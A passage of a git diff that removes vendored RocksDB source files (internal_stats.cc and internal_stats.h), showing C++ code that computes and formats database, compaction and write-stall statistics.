-  uint64_t estimate_keys = cfd_->mem()->num_entries() +
-                           cfd_->imm()->current()->GetTotalNumEntries() +
-                           vstorage->GetEstimatedActiveKeys();
-  uint64_t estimate_deletes =
-      cfd_->mem()->num_deletes() + cfd_->imm()->current()->GetTotalNumDeletes();
-  *value = estimate_keys > estimate_deletes * 2
-               ? estimate_keys - (estimate_deletes * 2)
-               : 0;
-  return true;
-}
-
-bool InternalStats::HandleNumSnapshots(uint64_t* value, DBImpl* db,
-                                       Version* version) {
-  *value = db->snapshots().count();
-  return true;
-}
-
-bool InternalStats::HandleOldestSnapshotTime(uint64_t* value, DBImpl* db,
-                                             Version* version) {
-  *value = static_cast<uint64_t>(db->snapshots().GetOldestSnapshotTime());
-  return true;
-}
-
-bool InternalStats::HandleNumLiveVersions(uint64_t* value, DBImpl* db,
-                                          Version* version) {
-  *value = cfd_->GetNumLiveVersions();
-  return true;
-}
-
-bool InternalStats::HandleCurrentSuperVersionNumber(uint64_t* value, DBImpl* db,
-                                                    Version* version) {
-  *value = cfd_->GetSuperVersionNumber();
-  return true;
-}
-
-bool InternalStats::HandleIsFileDeletionsEnabled(uint64_t* value, DBImpl* db,
-                                                 Version* version) {
-  *value = db->IsFileDeletionsEnabled();
-  return true;
-}
-
-bool InternalStats::HandleBaseLevel(uint64_t* value, DBImpl* db,
-                                    Version* version) {
-  const auto* vstorage = cfd_->current()->storage_info();
-  *value = vstorage->base_level();
-  return true;
-}
-
-bool InternalStats::HandleTotalSstFilesSize(uint64_t* value, DBImpl* db,
-                                            Version* version) {
-  *value = cfd_->GetTotalSstFilesSize();
-  return true;
-}
-
-bool InternalStats::HandleEstimatePendingCompactionBytes(uint64_t* value,
-                                                         DBImpl* db,
-                                                         Version* version) {
-  const auto* vstorage = cfd_->current()->storage_info();
-  *value = vstorage->estimated_compaction_needed_bytes();
-  return true;
-}
-
-bool InternalStats::HandleEstimateTableReadersMem(uint64_t* value, DBImpl* db,
-                                                  Version* version) {
-  *value = (version == nullptr) ? 0 : version->GetMemoryUsageByTableReaders();
-  return true;
-}
-
-bool InternalStats::HandleEstimateLiveDataSize(uint64_t* value, DBImpl* db,
-                                               Version* version) {
-  const auto* vstorage = cfd_->current()->storage_info();
-  *value = vstorage->EstimateLiveDataSize();
-  return true;
-}
-
-bool InternalStats::HandleMinLogNumberToKeep(uint64_t* value, DBImpl* db,
-                                             Version* version) {
-  *value = db->MinLogNumberToKeep();
-  return true;
-}
-
-bool InternalStats::HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db,
-                                                 Version* version) {
-  const WriteController& wc = db->write_controller();
-  if (!wc.NeedsDelay()) {
-    *value = 0;
-  } else {
-    *value = wc.delayed_write_rate();
-  }
-  return true;
-}
-
-bool InternalStats::HandleIsWriteStopped(uint64_t* value, DBImpl* db,
-                                         Version* version) {
-  *value = db->write_controller().IsStopped() ? 1 : 0;
-  return true;
-}
-
-bool InternalStats::HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* /*db*/,
-                                                Version* /*version*/) {
-  // TODO(yiwu): The property is currently available for fifo compaction
-  // with allow_compaction = false. This is because we don't propagate
-  // oldest_key_time on compaction.
-  if (cfd_->ioptions()->compaction_style != kCompactionStyleFIFO ||
-      cfd_->ioptions()->compaction_options_fifo.allow_compaction) {
-    return false;
-  }
-
-  TablePropertiesCollection collection;
-  auto s = cfd_->current()->GetPropertiesOfAllTables(&collection);
-  if (!s.ok()) {
-    return false;
-  }
-  *value = std::numeric_limits<uint64_t>::max();
-  for (auto& p : collection) {
-    *value = std::min(*value, p.second->oldest_key_time);
-    if (*value == 0) {
-      break;
-    }
-  }
-  if (*value > 0) {
-    *value = std::min({cfd_->mem()->ApproximateOldestKeyTime(),
-                       cfd_->imm()->ApproximateOldestKeyTime(), *value});
-  }
-  return *value > 0 && *value < std::numeric_limits<uint64_t>::max();
-}
-
-void InternalStats::DumpDBStats(std::string* value) {
-  char buf[1000];
-  // DB-level stats, only available from default column family
-  double seconds_up = (env_->NowMicros() - started_at_ + 1) / kMicrosInSec;
-  double interval_seconds_up = seconds_up - db_stats_snapshot_.seconds_up;
-  snprintf(buf, sizeof(buf),
-           "\n** DB Stats **\nUptime(secs): %.1f total, %.1f interval\n",
-           seconds_up, interval_seconds_up);
-  value->append(buf);
-  // Cumulative
-  uint64_t user_bytes_written = GetDBStats(InternalStats::BYTES_WRITTEN);
-  uint64_t num_keys_written = GetDBStats(InternalStats::NUMBER_KEYS_WRITTEN);
-  uint64_t write_other = GetDBStats(InternalStats::WRITE_DONE_BY_OTHER);
-  uint64_t write_self = GetDBStats(InternalStats::WRITE_DONE_BY_SELF);
-  uint64_t wal_bytes = GetDBStats(InternalStats::WAL_FILE_BYTES);
-  uint64_t wal_synced = GetDBStats(InternalStats::WAL_FILE_SYNCED);
-  uint64_t write_with_wal = GetDBStats(InternalStats::WRITE_WITH_WAL);
-  uint64_t write_stall_micros = GetDBStats(InternalStats::WRITE_STALL_MICROS);
-
-  const int kHumanMicrosLen = 32;
-  char human_micros[kHumanMicrosLen];
-
-  // Data
-  // writes: total number of write requests.
-  // keys: total number of key updates issued by all the write requests
-  // commit groups: number of group commits issued to the DB. Each group can
-  //                contain one or more writes.
-  // so writes/keys is the average number of put in multi-put or put
-  // writes/groups is the average group commit size.
-  //
-  // The format is the same for interval stats.
-  snprintf(buf, sizeof(buf),
-           "Cumulative writes: %s writes, %s keys, %s commit groups, "
-           "%.1f writes per commit group, ingest: %.2f GB, %.2f MB/s\n",
-           NumberToHumanString(write_other + write_self).c_str(),
-           NumberToHumanString(num_keys_written).c_str(),
-           NumberToHumanString(write_self).c_str(),
-           (write_other + write_self) / static_cast<double>(write_self + 1),
-           user_bytes_written / kGB, user_bytes_written / kMB / seconds_up);
-  value->append(buf);
-  // WAL
-  snprintf(buf, sizeof(buf),
-           "Cumulative WAL: %s writes, %s syncs, "
-           "%.2f writes per sync, written: %.2f GB, %.2f MB/s\n",
-           NumberToHumanString(write_with_wal).c_str(),
-           NumberToHumanString(wal_synced).c_str(),
-           write_with_wal / static_cast<double>(wal_synced + 1),
-           wal_bytes / kGB, wal_bytes / kMB / seconds_up);
-  value->append(buf);
-  // Stall
-  AppendHumanMicros(write_stall_micros, human_micros, kHumanMicrosLen, true);
-  snprintf(buf, sizeof(buf),
-           "Cumulative stall: %s, %.1f percent\n",
-           human_micros,
-           // 10000 = divide by 1M to get secs, then multiply by 100 for pct
-           write_stall_micros / 10000.0 / std::max(seconds_up, 0.001));
-  value->append(buf);
-
-  // Interval
-  uint64_t interval_write_other = write_other - db_stats_snapshot_.write_other;
-  uint64_t interval_write_self = write_self - db_stats_snapshot_.write_self;
-  uint64_t interval_num_keys_written =
-      num_keys_written - db_stats_snapshot_.num_keys_written;
-  snprintf(buf, sizeof(buf),
-           "Interval writes: %s writes, %s keys, %s commit groups, "
-           "%.1f writes per commit group, ingest: %.2f MB, %.2f MB/s\n",
-           NumberToHumanString(
-               interval_write_other + interval_write_self).c_str(),
-           NumberToHumanString(interval_num_keys_written).c_str(),
-           NumberToHumanString(interval_write_self).c_str(),
-           static_cast<double>(interval_write_other + interval_write_self) /
-               (interval_write_self + 1),
-           (user_bytes_written - db_stats_snapshot_.ingest_bytes) / kMB,
-           (user_bytes_written - db_stats_snapshot_.ingest_bytes) / kMB /
-               std::max(interval_seconds_up, 0.001)),
-  value->append(buf);
-
-  uint64_t interval_write_with_wal =
-      write_with_wal - db_stats_snapshot_.write_with_wal;
-  uint64_t interval_wal_synced = wal_synced - db_stats_snapshot_.wal_synced;
-  uint64_t interval_wal_bytes = wal_bytes - db_stats_snapshot_.wal_bytes;
-
-  snprintf(buf, sizeof(buf),
-           "Interval WAL: %s writes, %s syncs, "
-           "%.2f writes per sync, written: %.2f MB, %.2f MB/s\n",
-           NumberToHumanString(interval_write_with_wal).c_str(),
-           NumberToHumanString(interval_wal_synced).c_str(),
-           interval_write_with_wal /
-              static_cast<double>(interval_wal_synced + 1),
-           interval_wal_bytes / kGB,
-           interval_wal_bytes / kMB / std::max(interval_seconds_up, 0.001));
-  value->append(buf);
-
-  // Stall
-  AppendHumanMicros(
-      write_stall_micros - db_stats_snapshot_.write_stall_micros,
-      human_micros, kHumanMicrosLen, true);
-  snprintf(buf, sizeof(buf),
-           "Interval stall: %s, %.1f percent\n",
-           human_micros,
-           // 10000 = divide by 1M to get secs, then multiply by 100 for pct
-           (write_stall_micros - db_stats_snapshot_.write_stall_micros) /
-               10000.0 / std::max(interval_seconds_up, 0.001));
-  value->append(buf);
-
-  db_stats_snapshot_.seconds_up = seconds_up;
-  db_stats_snapshot_.ingest_bytes = user_bytes_written;
-  db_stats_snapshot_.write_other = write_other;
-  db_stats_snapshot_.write_self = write_self;
-  db_stats_snapshot_.num_keys_written = num_keys_written;
-  db_stats_snapshot_.wal_bytes = wal_bytes;
-  db_stats_snapshot_.wal_synced = wal_synced;
-  db_stats_snapshot_.write_with_wal = write_with_wal;
-  db_stats_snapshot_.write_stall_micros = write_stall_micros;
-}
-
-/**
- * Dump Compaction Level stats to a map of stat name to value in double.
- * The level in stat name is represented with a prefix "Lx" where "x"
- * is the level number. A special level "Sum" represents the sum of a stat
- * for all levels.
- */
-void InternalStats::DumpCFMapStats(std::map<std::string, double>* cf_stats) {
-  CompactionStats compaction_stats_sum(0);
-  std::map<int, std::map<LevelStatType, double>> levels_stats;
-  DumpCFMapStats(&levels_stats, &compaction_stats_sum);
-  for (auto const& level_ent : levels_stats) {
-    auto level_str =
-        level_ent.first == -1 ? "Sum" : "L" + ToString(level_ent.first);
-    for (auto const& stat_ent : level_ent.second) {
-      auto stat_type = stat_ent.first;
-      auto key_str =
-          level_str + "." +
-          InternalStats::compaction_level_stats.at(stat_type).property_name;
-      (*cf_stats)[key_str] = stat_ent.second;
-    }
-  }
-}
-
-void InternalStats::DumpCFMapStats(
-    std::map<int, std::map<LevelStatType, double>>* levels_stats,
-    CompactionStats* compaction_stats_sum) {
-  const VersionStorageInfo* vstorage = cfd_->current()->storage_info();
-
-  int num_levels_to_check =
-      (cfd_->ioptions()->compaction_style != kCompactionStyleFIFO)
-          ? vstorage->num_levels() - 1
-          : 1;
-
-  // Compaction scores are sorted based on its value. Restore them to the
-  // level order
-  std::vector<double> compaction_score(number_levels_, 0);
-  for (int i = 0; i < num_levels_to_check; ++i) {
-    compaction_score[vstorage->CompactionScoreLevel(i)] =
-        vstorage->CompactionScore(i);
-  }
-  // Count # of files being compacted for each level
-  std::vector<int> files_being_compacted(number_levels_, 0);
-  for (int level = 0; level < number_levels_; ++level) {
-    for (auto* f : vstorage->LevelFiles(level)) {
-      if (f->being_compacted) {
-        ++files_being_compacted[level];
-      }
-    }
-  }
-
-  int total_files = 0;
-  int total_files_being_compacted = 0;
-  double total_file_size = 0;
-  uint64_t flush_ingest = cf_stats_value_[BYTES_FLUSHED];
-  uint64_t add_file_ingest = cf_stats_value_[BYTES_INGESTED_ADD_FILE];
-  uint64_t curr_ingest = flush_ingest + add_file_ingest;
-  for (int level = 0; level < number_levels_; level++) {
-    int files = vstorage->NumLevelFiles(level);
-    total_files += files;
-    total_files_being_compacted += files_being_compacted[level];
-    if (comp_stats_[level].micros > 0 || files > 0) {
-      compaction_stats_sum->Add(comp_stats_[level]);
-      total_file_size += vstorage->NumLevelBytes(level);
-      uint64_t input_bytes;
-      if (level == 0) {
-        input_bytes = curr_ingest;
-      } else {
-        input_bytes = comp_stats_[level].bytes_read_non_output_levels;
-      }
-      double w_amp =
-          (input_bytes == 0)
-              ? 0.0
-              : static_cast<double>(comp_stats_[level].bytes_written) /
-                    input_bytes;
-      std::map<LevelStatType, double> level_stats;
-      PrepareLevelStats(&level_stats, files, files_being_compacted[level],
-                        static_cast<double>(vstorage->NumLevelBytes(level)),
-                        compaction_score[level], w_amp, comp_stats_[level]);
-      (*levels_stats)[level] = level_stats;
-    }
-  }
-  // Cumulative summary
-  double w_amp = compaction_stats_sum->bytes_written /
-                 static_cast<double>(curr_ingest + 1);
-  // Stats summary across levels
-  std::map<LevelStatType, double> sum_stats;
-  PrepareLevelStats(&sum_stats, total_files, total_files_being_compacted,
-                    total_file_size, 0, w_amp, *compaction_stats_sum);
-  (*levels_stats)[-1] = sum_stats;  //  -1 is for the Sum level
-}
-
-void InternalStats::DumpCFStats(std::string* value) {
-  DumpCFStatsNoFileHistogram(value);
-  DumpCFFileHistogram(value);
-}
-
-void InternalStats::DumpCFStatsNoFileHistogram(std::string* value) {
-  char buf[2000];
-  // Per-ColumnFamily stats
-  PrintLevelStatsHeader(buf, sizeof(buf), cfd_->GetName());
-  value->append(buf);
-
-  // Print stats for each level
-  std::map<int, std::map<LevelStatType, double>> levels_stats;
-  CompactionStats compaction_stats_sum(0);
-  DumpCFMapStats(&levels_stats, &compaction_stats_sum);
-  for (int l = 0; l < number_levels_; ++l) {
-    if (levels_stats.find(l) != levels_stats.end()) {
-      PrintLevelStats(buf, sizeof(buf), "L" + ToString(l), levels_stats[l]);
-      value->append(buf);
-    }
-  }
-
-  // Print sum of level stats
-  PrintLevelStats(buf, sizeof(buf), "Sum", levels_stats[-1]);
-  value->append(buf);
-
-  uint64_t flush_ingest = cf_stats_value_[BYTES_FLUSHED];
-  uint64_t add_file_ingest = cf_stats_value_[BYTES_INGESTED_ADD_FILE];
-  uint64_t ingest_files_addfile = cf_stats_value_[INGESTED_NUM_FILES_TOTAL];
-  uint64_t ingest_l0_files_addfile =
-      cf_stats_value_[INGESTED_LEVEL0_NUM_FILES_TOTAL];
-  uint64_t ingest_keys_addfile = cf_stats_value_[INGESTED_NUM_KEYS_TOTAL];
-  // Cumulative summary
-  uint64_t total_stall_count =
-      cf_stats_count_[LEVEL0_SLOWDOWN_TOTAL] +
-      cf_stats_count_[LEVEL0_NUM_FILES_TOTAL] +
-      cf_stats_count_[SOFT_PENDING_COMPACTION_BYTES_LIMIT] +
-      cf_stats_count_[HARD_PENDING_COMPACTION_BYTES_LIMIT] +
-      cf_stats_count_[MEMTABLE_COMPACTION] + cf_stats_count_[MEMTABLE_SLOWDOWN];
-  // Interval summary
-  uint64_t interval_flush_ingest =
-      flush_ingest - cf_stats_snapshot_.ingest_bytes_flush;
-  uint64_t interval_add_file_inget =
-      add_file_ingest - cf_stats_snapshot_.ingest_bytes_addfile;
-  uint64_t interval_ingest =
-      interval_flush_ingest + interval_add_file_inget + 1;
-  CompactionStats interval_stats(compaction_stats_sum);
-  interval_stats.Subtract(cf_stats_snapshot_.comp_stats);
-  double w_amp =
-      interval_stats.bytes_written / static_cast<double>(interval_ingest);
-  PrintLevelStats(buf, sizeof(buf), "Int", 0, 0, 0, 0, w_amp, interval_stats);
-  value->append(buf);
-
-  double seconds_up = (env_->NowMicros() - started_at_ + 1) / kMicrosInSec;
-  double interval_seconds_up = seconds_up - cf_stats_snapshot_.seconds_up;
-  snprintf(buf, sizeof(buf), "Uptime(secs): %.1f total, %.1f interval\n",
-           seconds_up, interval_seconds_up);
-  value->append(buf);
-  snprintf(buf, sizeof(buf), "Flush(GB): cumulative %.3f, interval %.3f\n",
-           flush_ingest / kGB, interval_flush_ingest / kGB);
-  value->append(buf);
-  snprintf(buf, sizeof(buf), "AddFile(GB): cumulative %.3f, interval %.3f\n",
-           add_file_ingest / kGB, interval_add_file_inget / kGB);
-  value->append(buf);
-
-  uint64_t interval_ingest_files_addfile =
-      ingest_files_addfile - cf_stats_snapshot_.ingest_files_addfile;
-  snprintf(buf, sizeof(buf), "AddFile(Total Files): cumulative %" PRIu64
-                             ", interval %" PRIu64 "\n",
-           ingest_files_addfile, interval_ingest_files_addfile);
-  value->append(buf);
-
-  uint64_t interval_ingest_l0_files_addfile =
-      ingest_l0_files_addfile - cf_stats_snapshot_.ingest_l0_files_addfile;
-  snprintf(buf, sizeof(buf),
-           "AddFile(L0 Files): cumulative %" PRIu64 ", interval %" PRIu64 "\n",
-           ingest_l0_files_addfile, interval_ingest_l0_files_addfile);
-  value->append(buf);
-
-  uint64_t interval_ingest_keys_addfile =
-      ingest_keys_addfile - cf_stats_snapshot_.ingest_keys_addfile;
-  snprintf(buf, sizeof(buf),
-           "AddFile(Keys): cumulative %" PRIu64 ", interval %" PRIu64 "\n",
-           ingest_keys_addfile, interval_ingest_keys_addfile);
-  value->append(buf);
-
-  // Compact
-  uint64_t compact_bytes_read = 0;
-  uint64_t compact_bytes_write = 0;
-  uint64_t compact_micros = 0;
-  for (int level = 0; level < number_levels_; level++) {
-    compact_bytes_read += comp_stats_[level].bytes_read_output_level +
-                          comp_stats_[level].bytes_read_non_output_levels;
-    compact_bytes_write += comp_stats_[level].bytes_written;
-    compact_micros += comp_stats_[level].micros;
-  }
-
-  snprintf(buf, sizeof(buf),
-           "Cumulative compaction: %.2f GB write, %.2f MB/s write, "
-           "%.2f GB read, %.2f MB/s read, %.1f seconds\n",
-           compact_bytes_write / kGB, compact_bytes_write / kMB / seconds_up,
-           compact_bytes_read / kGB, compact_bytes_read / kMB / seconds_up,
-           compact_micros / kMicrosInSec);
-  value->append(buf);
-
-  // Compaction interval
-  uint64_t interval_compact_bytes_write =
-      compact_bytes_write - cf_stats_snapshot_.compact_bytes_write;
-  uint64_t interval_compact_bytes_read =
-      compact_bytes_read - cf_stats_snapshot_.compact_bytes_read;
-  uint64_t interval_compact_micros =
-      compact_micros - cf_stats_snapshot_.compact_micros;
-
-  snprintf(
-      buf, sizeof(buf),
-      "Interval compaction: %.2f GB write, %.2f MB/s write, "
-      "%.2f GB read, %.2f MB/s read, %.1f seconds\n",
-      interval_compact_bytes_write / kGB,
-      interval_compact_bytes_write / kMB / std::max(interval_seconds_up, 0.001),
-      interval_compact_bytes_read / kGB,
-      interval_compact_bytes_read / kMB / std::max(interval_seconds_up, 0.001),
-      interval_compact_micros / kMicrosInSec);
-  value->append(buf);
-  cf_stats_snapshot_.compact_bytes_write = compact_bytes_write;
-  cf_stats_snapshot_.compact_bytes_read = compact_bytes_read;
-  cf_stats_snapshot_.compact_micros = compact_micros;
-
-  snprintf(buf, sizeof(buf), "Stalls(count): %" PRIu64
-                             " level0_slowdown, "
-                             "%" PRIu64
-                             " level0_slowdown_with_compaction, "
-                             "%" PRIu64
-                             " level0_numfiles, "
-                             "%" PRIu64
-                             " level0_numfiles_with_compaction, "
-                             "%" PRIu64
-                             " stop for pending_compaction_bytes, "
-                             "%" PRIu64
-                             " slowdown for pending_compaction_bytes, "
-                             "%" PRIu64
-                             " memtable_compaction, "
-                             "%" PRIu64
-                             " memtable_slowdown, "
-                             "interval %" PRIu64 " total count\n",
-           cf_stats_count_[LEVEL0_SLOWDOWN_TOTAL],
-           cf_stats_count_[LEVEL0_SLOWDOWN_WITH_COMPACTION],
-           cf_stats_count_[LEVEL0_NUM_FILES_TOTAL],
-           cf_stats_count_[LEVEL0_NUM_FILES_WITH_COMPACTION],
-           cf_stats_count_[HARD_PENDING_COMPACTION_BYTES_LIMIT],
-           cf_stats_count_[SOFT_PENDING_COMPACTION_BYTES_LIMIT],
-           cf_stats_count_[MEMTABLE_COMPACTION],
-           cf_stats_count_[MEMTABLE_SLOWDOWN],
-           total_stall_count - cf_stats_snapshot_.stall_count);
-  value->append(buf);
-
-  cf_stats_snapshot_.seconds_up = seconds_up;
-  cf_stats_snapshot_.ingest_bytes_flush = flush_ingest;
-  cf_stats_snapshot_.ingest_bytes_addfile = add_file_ingest;
-  cf_stats_snapshot_.ingest_files_addfile = ingest_files_addfile;
-  cf_stats_snapshot_.ingest_l0_files_addfile = ingest_l0_files_addfile;
-  cf_stats_snapshot_.ingest_keys_addfile = ingest_keys_addfile;
-  cf_stats_snapshot_.comp_stats = compaction_stats_sum;
-  cf_stats_snapshot_.stall_count = total_stall_count;
-}
-
-void InternalStats::DumpCFFileHistogram(std::string* value) {
-  char buf[2000];
-  snprintf(buf, sizeof(buf),
-           "\n** File Read Latency Histogram By Level [%s] **\n",
-           cfd_->GetName().c_str());
-  value->append(buf);
-
-  for (int level = 0; level < number_levels_; level++) {
-    if (!file_read_latency_[level].Empty()) {
-      char buf2[5000];
-      snprintf(buf2, sizeof(buf2),
-               "** Level %d read latency histogram (micros):\n%s\n", level,
-               file_read_latency_[level].ToString().c_str());
-      value->append(buf2);
-    }
-  }
-}
-
-#else
-
-const DBPropertyInfo* GetPropertyInfo(const Slice& property) { return nullptr; }
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/internal_stats.h b/thirdparty/rocksdb/db/internal_stats.h
deleted file mode 100644
index a0b8a90..0000000
--- a/thirdparty/rocksdb/db/internal_stats.h
+++ /dev/null
@@ -1,590 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-
-#pragma once
-#include <map>
-#include <string>
-#include <vector>
-
-#include "db/version_set.h"
-
-class ColumnFamilyData;
-
-namespace rocksdb {
-
-class MemTableList;
-class DBImpl;
-
-// Config for retrieving a property's value.
-struct DBPropertyInfo {
-  bool need_out_of_mutex;
-
-  // gcc had an internal error for initializing union of pointer-to-member-
-  // functions. Workaround is to populate exactly one of the following function
-  // pointers with a non-nullptr value.
-
-  // @param value Value-result argument for storing the property's string value
-  // @param suffix Argument portion of the property. For example, suffix would
-  //      be "5" for the property "rocksdb.num-files-at-level5". So far, only
-  //      certain string properties take an argument.
-  bool (InternalStats::*handle_string)(std::string* value, Slice suffix);
-
-  // @param value Value-result argument for storing the property's uint64 value
-  // @param db Many of the int properties rely on DBImpl methods.
-  // @param version Version is needed in case the property is retrieved without
-  //      holding db mutex, which is only supported for int properties.
-  bool (InternalStats::*handle_int)(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool (InternalStats::*handle_map)(
-      std::map<std::string, double>* compaction_stats);
-};
-
-extern const DBPropertyInfo* GetPropertyInfo(const Slice& property);
-
-#ifndef ROCKSDB_LITE
-#undef SCORE
-enum class LevelStatType {
-  INVALID = 0,
-  NUM_FILES,
-  COMPACTED_FILES,
-  SIZE_BYTES,
-  SCORE,
-  READ_GB,
-  RN_GB,
-  RNP1_GB,
-  WRITE_GB,
-  W_NEW_GB,
-  MOVED_GB,
-  WRITE_AMP,
-  READ_MBPS,
-  WRITE_MBPS,
-  COMP_SEC,
-  COMP_COUNT,
-  AVG_SEC,
-  KEY_IN,
-  KEY_DROP,
-  TOTAL  // total number of types
-};
-
-struct LevelStat {
-  // This what will be L?.property_name in the flat map returned to the user
-  std::string property_name;
-  // This will be what we will print in the header in the cli
-  std::string header_name;
-};
-
-class InternalStats {
- public:
-  static const std::map<LevelStatType, LevelStat> compaction_level_stats;
-
-  enum InternalCFStatsType {
-    LEVEL0_SLOWDOWN_TOTAL,
-    LEVEL0_SLOWDOWN_WITH_COMPACTION,
-    MEMTABLE_COMPACTION,
-    MEMTABLE_SLOWDOWN,
-    LEVEL0_NUM_FILES_TOTAL,
-    LEVEL0_NUM_FILES_WITH_COMPACTION,
-    SOFT_PENDING_COMPACTION_BYTES_LIMIT,
-    HARD_PENDING_COMPACTION_BYTES_LIMIT,
-    WRITE_STALLS_ENUM_MAX,
-    BYTES_FLUSHED,
-    BYTES_INGESTED_ADD_FILE,
-    INGESTED_NUM_FILES_TOTAL,
-    INGESTED_LEVEL0_NUM_FILES_TOTAL,
-    INGESTED_NUM_KEYS_TOTAL,
-    INTERNAL_CF_STATS_ENUM_MAX,
-  };
-
-  enum InternalDBStatsType {
-    WAL_FILE_BYTES,
-    WAL_FILE_SYNCED,
-    BYTES_WRITTEN,
-    NUMBER_KEYS_WRITTEN,
-    WRITE_DONE_BY_OTHER,
-    WRITE_DONE_BY_SELF,
-    WRITE_WITH_WAL,
-    WRITE_STALL_MICROS,
-    INTERNAL_DB_STATS_ENUM_MAX,
-  };
-
-  InternalStats(int num_levels, Env* env, ColumnFamilyData* cfd)
-      : db_stats_{},
-        cf_stats_value_{},
-        cf_stats_count_{},
-        comp_stats_(num_levels),
-        file_read_latency_(num_levels),
-        bg_error_count_(0),
-        number_levels_(num_levels),
-        env_(env),
-        cfd_(cfd),
-        started_at_(env->NowMicros()) {}
-
-  // Per level compaction stats.  comp_stats_[level] stores the stats for
-  // compactions that produced data for the specified "level".
-  struct CompactionStats {
-    uint64_t micros;
-
-    // The number of bytes read from all non-output levels
-    uint64_t bytes_read_non_output_levels;
-
-    // The number of bytes read from the compaction output level.
-    uint64_t bytes_read_output_level;
-
-    // Total number of bytes written during compaction
-    uint64_t bytes_written;
-
-    // Total number of bytes moved to the output level
-    uint64_t bytes_moved;
-
-    // The number of compaction input files in all non-output levels.
-    int num_input_files_in_non_output_levels;
-
-    // The number of compaction input files in the output level.
-    int num_input_files_in_output_level;
-
-    // The number of compaction output files.
-    int num_output_files;
-
-    // Total incoming entries during compaction between levels N and N+1
-    uint64_t num_input_records;
-
-    // Accumulated diff number of entries
-    // (num input entries - num output entires) for compaction  levels N and N+1
-    uint64_t num_dropped_records;
-
-    // Number of compactions done
-    int count;
-
-    explicit CompactionStats(int _count = 0)
-        : micros(0),
-          bytes_read_non_output_levels(0),
-          bytes_read_output_level(0),
-          bytes_written(0),
-          bytes_moved(0),
-          num_input_files_in_non_output_levels(0),
-          num_input_files_in_output_level(0),
-          num_output_files(0),
-          num_input_records(0),
-          num_dropped_records(0),
-          count(_count) {}
-
-    explicit CompactionStats(const CompactionStats& c)
-        : micros(c.micros),
-          bytes_read_non_output_levels(c.bytes_read_non_output_levels),
-          bytes_read_output_level(c.bytes_read_output_level),
-          bytes_written(c.bytes_written),
-          bytes_moved(c.bytes_moved),
-          num_input_files_in_non_output_levels(
-              c.num_input_files_in_non_output_levels),
-          num_input_files_in_output_level(
-              c.num_input_files_in_output_level),
-          num_output_files(c.num_output_files),
-          num_input_records(c.num_input_records),
-          num_dropped_records(c.num_dropped_records),
-          count(c.count) {}
-
-    void Clear() {
-      this->micros = 0;
-      this->bytes_read_non_output_levels = 0;
-      this->bytes_read_output_level = 0;
-      this->bytes_written = 0;
-      this->bytes_moved = 0;
-      this->num_input_files_in_non_output_levels = 0;
-      this->num_input_files_in_output_level = 0;
-      this->num_output_files = 0;
-      this->num_input_records = 0;
-      this->num_dropped_records = 0;
-      this->count = 0;
-    }
-
-    void Add(const CompactionStats& c) {
-      this->micros += c.micros;
-      this->bytes_read_non_output_levels += c.bytes_read_non_output_levels;
-      this->bytes_read_output_level += c.bytes_read_output_level;
-      this->bytes_written += c.bytes_written;
-      this->bytes_moved += c.bytes_moved;
-      this->num_input_files_in_non_output_levels +=
-          c.num_input_files_in_non_output_levels;
-      this->num_input_files_in_output_level +=
-          c.num_input_files_in_output_level;
-      this->num_output_files += c.num_output_files;
-      this->num_input_records += c.num_input_records;
-      this->num_dropped_records += c.num_dropped_records;
-      this->count += c.count;
-    }
-
-    void Subtract(const CompactionStats& c) {
-      this->micros -= c.micros;
-      this->bytes_read_non_output_levels -= c.bytes_read_non_output_levels;
-      this->bytes_read_output_level -= c.bytes_read_output_level;
-      this->bytes_written -= c.bytes_written;
-      this->bytes_moved -= c.bytes_moved;
-      this->num_input_files_in_non_output_levels -=
-          c.num_input_files_in_non_output_levels;
-      this->num_input_files_in_output_level -=
-          c.num_input_files_in_output_level;
-      this->num_output_files -= c.num_output_files;
-      this->num_input_records -= c.num_input_records;
-      this->num_dropped_records -= c.num_dropped_records;
-      this->count -= c.count;
-    }
-  };
-
-  void Clear() {
-    for (int i = 0; i < INTERNAL_DB_STATS_ENUM_MAX; i++) {
-      db_stats_[i].store(0);
-    }
-    for (int i = 0; i < INTERNAL_CF_STATS_ENUM_MAX; i++) {
-      cf_stats_count_[i] = 0;
-      cf_stats_value_[i] = 0;
-    }
-    for (auto& comp_stat : comp_stats_) {
-      comp_stat.Clear();
-    }
-    for (auto& h : file_read_latency_) {
-      h.Clear();
-    }
-    cf_stats_snapshot_.Clear();
-    db_stats_snapshot_.Clear();
-    bg_error_count_ = 0;
-    started_at_ = env_->NowMicros();
-  }
-
-  void AddCompactionStats(int level, const CompactionStats& stats) {
-    comp_stats_[level].Add(stats);
-  }
-
-  void IncBytesMoved(int level, uint64_t amount) {
-    comp_stats_[level].bytes_moved += amount;
-  }
-
-  void AddCFStats(InternalCFStatsType type, uint64_t value) {
-    cf_stats_value_[type] += value;
-    ++cf_stats_count_[type];
-  }
-
-  void AddDBStats(InternalDBStatsType type, uint64_t value,
-                  bool concurrent = false) {
-    auto& v = db_stats_[type];
-    if (concurrent) {
-      v.fetch_add(value, std::memory_order_relaxed);
-    } else {
-      v.store(v.load(std::memory_order_relaxed) + value,
-              std::memory_order_relaxed);
-    }
-  }
-
-  uint64_t GetDBStats(InternalDBStatsType type) {
-    return db_stats_[type].load(std::memory_order_relaxed);
-  }
-
-  HistogramImpl* GetFileReadHist(int level) {
-    return &file_read_latency_[level];
-  }
-
-  uint64_t GetBackgroundErrorCount() const { return bg_error_count_; }
-
-  uint64_t BumpAndGetBackgroundErrorCount() { return ++bg_error_count_; }
-
-  bool GetStringProperty(const DBPropertyInfo& property_info,
-                         const Slice& property, std::string* value);
-
-  bool GetMapProperty(const DBPropertyInfo& property_info,
-                      const Slice& property,
-                      std::map<std::string, double>* value);
-
-  bool GetIntProperty(const DBPropertyInfo& property_info, uint64_t* value,
-                      DBImpl* db);
-
-  bool GetIntPropertyOutOfMutex(const DBPropertyInfo& property_info,
-                                Version* version, uint64_t* value);
-
-  // Store a mapping from the user-facing DB::Properties string to our
